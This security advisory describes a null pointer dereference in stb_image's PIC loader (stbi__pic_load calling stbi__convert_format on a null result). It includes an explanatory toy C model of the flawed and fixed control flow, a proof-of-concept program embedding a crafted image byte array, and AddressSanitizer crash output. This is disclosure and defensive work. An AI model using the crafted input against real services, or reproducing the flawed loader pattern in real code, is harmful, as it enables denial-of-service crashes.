stb
Null pointer dereference in `stbi__convert_format` (`GHSL-2023-149`)
A crafted image file can trigger a null pointer access in `stbi__convert_format` where `src` is null. It happens when `stbi__pic_load_core`, called from `stbi__pic_load`, fails: the result is set to zero [1], but the flow continues into the conversion call [2].
```c
   if (!stbi__pic_load_core(s,x,y,comp, result)) {
      STBI_FREE(result);
      result=0; // [1]
   }
   *px = x;
   *py = y;

   if (req_comp == 0) req_comp = *comp;
   result=stbi__convert_format(result,4,req_comp,x,y); // [2]
```
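To show the control-flow defect in isolation, the following added example (constructed for this write-up, not stb code) models `stbi__pic_load` with a toy image format: a flawed loader shaped like the snippet above, which still calls its converter after `result` has been set to null, beside a fixed loader that returns as soon as the core loader fails. The toy format (width byte, height byte, then `w*h*4` RGBA bytes), the `toy_*` names and the two sample inputs are assumptions; the real `stbi__convert_format` does far more than repack bytes, but it shares the one property that matters here: it dereferences `src` unconditionally.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Added example, not stb code: a toy model of the stbi__pic_load control flow.
 * Assumed toy format: width byte, height byte, then w*h*4 RGBA bytes. */

typedef struct { const uint8_t *buf; size_t len, pos; } toy_ctx;

static int toy_get8(toy_ctx *s) { return s->pos < s->len ? s->buf[s->pos++] : -1; }

/* Stand-in for stbi__pic_load_core: fills the caller's buffer, returns 0 on failure. */
static int toy_load_core(toy_ctx *s, int w, int h, uint8_t *out) {
    size_t need = (size_t)w * (size_t)h * 4;
    for (size_t i = 0; i < need; i++) {
        int b = toy_get8(s);
        if (b < 0) return 0;            /* truncated pixel data */
        out[i] = (uint8_t)b;
    }
    return 1;
}

/* Stand-in for stbi__convert_format: repacks RGBA into req_comp channels.
 * Like the real one it never checks src for NULL. */
static uint8_t *toy_convert_format(uint8_t *src, int req_comp, int w, int h) {
    if (req_comp == 4) return src;      /* nothing to do, hand back the input */
    uint8_t *dst = malloc((size_t)w * (size_t)h * (size_t)req_comp);
    if (!dst) { free(src); return NULL; }
    for (int i = 0; i < w * h; i++)
        for (int c = 0; c < req_comp; c++)
            dst[i * req_comp + c] = src[i * 4 + c];   /* reads src: NULL here is a zero-page read */
    free(src);
    return dst;
}

/* Shared header step; returns 0 on a bad header. */
static int toy_read_header(toy_ctx *s, int *w, int *h) {
    int a = toy_get8(s), b = toy_get8(s);
    if (a <= 0 || b <= 0) return 0;
    *w = a; *h = b;
    return 1;
}

/* Flawed flow, shaped like the advisory's [1]/[2]: result becomes NULL and the
 * converter is still called. Do not call this on truncated input. */
uint8_t *toy_pic_load_flawed(const uint8_t *data, size_t len, int *px, int *py, int req_comp) {
    toy_ctx s = { data, len, 0 };
    int x, y;
    if (!toy_read_header(&s, &x, &y)) return NULL;
    uint8_t *result = malloc((size_t)x * (size_t)y * 4);
    if (!result) return NULL;
    if (!toy_load_core(&s, x, y, result)) {
        free(result);
        result = 0;                                          /* [1] */
    }
    *px = x; *py = y;
    return toy_convert_format(result, req_comp, x, y);       /* [2] NULL src on failure */
}

/* Fixed flow: a failed core load is a failed load, so return before converting. */
uint8_t *toy_pic_load_fixed(const uint8_t *data, size_t len, int *px, int *py, int req_comp) {
    toy_ctx s = { data, len, 0 };
    int x, y;
    if (!toy_read_header(&s, &x, &y)) return NULL;
    uint8_t *result = malloc((size_t)x * (size_t)y * 4);
    if (!result) return NULL;
    if (!toy_load_core(&s, x, y, result)) {
        free(result);
        return NULL;                                         /* never reaches the converter */
    }
    *px = x; *py = y;
    return toy_convert_format(result, req_comp, x, y);
}

int main(void) {
    /* Constructed inputs: a complete 2x1 image and the same image truncated mid-pixel. */
    const uint8_t good[] = { 2, 1, 10, 20, 30, 40, 50, 60, 70, 80 };
    const uint8_t bad[]  = { 2, 1, 10, 20, 30, 40, 50 };
    int x = 0, y = 0;
    uint8_t *img = toy_pic_load_fixed(good, sizeof good, &x, &y, 2);
    if (img) printf("good: %dx%d, first pixel = (%u, %u)\n", x, y, img[0], img[1]);
    free(img);
    img = toy_pic_load_fixed(bad, sizeof bad, &x, &y, 2);
    printf("bad: %s\n", img ? "decoded?!" : "NULL returned, no crash");
    free(img);
    return 0;
}
```

The fixed variant is the shape to look for when auditing loaders that allocate, fill, and then post-process: any branch that releases the buffer must also leave the function, or every later consumer of that pointer needs its own null check.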
Impact
This issue may lead to denial of service.
Resources
To reproduce the issue:
- Make an ASAN build of the following program:
```c
#include <stdint.h>

#define STB_IMAGE_IMPLEMENTATION
#include "../stb_image.h"

int main(int argc, char* argv[])
{
    /* Crafted PIC image: stbi__pic_load_core fails on it after the header is accepted. */
    const uint8_t data[] = {0x53,0x80,0xf6,0x34,0x00,0x00,0x00,0x00,0x00,0x00,
                            0x00,0x00,0x40,0x00,0x08,0x01,0x20,0xff,0x10,0x40,
                            0x74,0x72,0x74,0x65,0x69,0xab,0x4c,0x65,0x31,0x6e,
                            0x20,0x62,0x79,0x20,0x6d,0x65,0x6e,0x74,0x61,0x6c,
                            0x20,0x69,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,
                            0x49,0x43,0x54,0x00,0x50,0x49,0x43,0x57,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
                            0x08,0x01,0x20,0xff,0x10,0x6e,0x74,0x61,0x6c,0x20,
                            0x69,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x49,
                            0x43,0x54,0x00,0x50,0x54,0x20,0x10};
    size_t size = sizeof(data);
    int x, y, channels;

    /* req_comp = 2 forces the stbi__convert_format call on the null result. */
    stbi_uc *img = stbi_load_from_memory(data, size, &x, &y, &channels, 2);
    stbi_image_free(img);
    return 0;
}
```
- Run the program to hit the error.
```text
==183891==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004f944d bp 0x7ffefb18fe50 sp 0x7ffefb18fa00 T0)
==183891==The signal is caused by a READ memory access.
==183891==Hint: address points to the zero page.
    #0 0x4f944d in stbi__convert_format(unsigned char*, int, int, unsigned int, unsigned int) tests/../stb_image.h:1786:52
    #1 0x4ecdbe in stbi__pic_load(stbi__context*, int*, int*, int*, int, stbi__result_info*) tests/../stb_image.h:6535:11
    #2 0x4e463b in stbi__load_main(stbi__context*, int*, int*, int*, int, stbi__result_info*, int) tests/../stb_image.h:1159:35
    #3 0x4dc48f in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) tests/../stb_image.h:1261:19
    #4 0x4de334 in stbi_load_from_memory tests/../stb_image.h:1431:11
```
Looks like it collided with https://github.com/nothings/stb/issues/1521 which has CVE-2023-43898 assigned to it. I'll request to withdraw the CVE-2023-45665.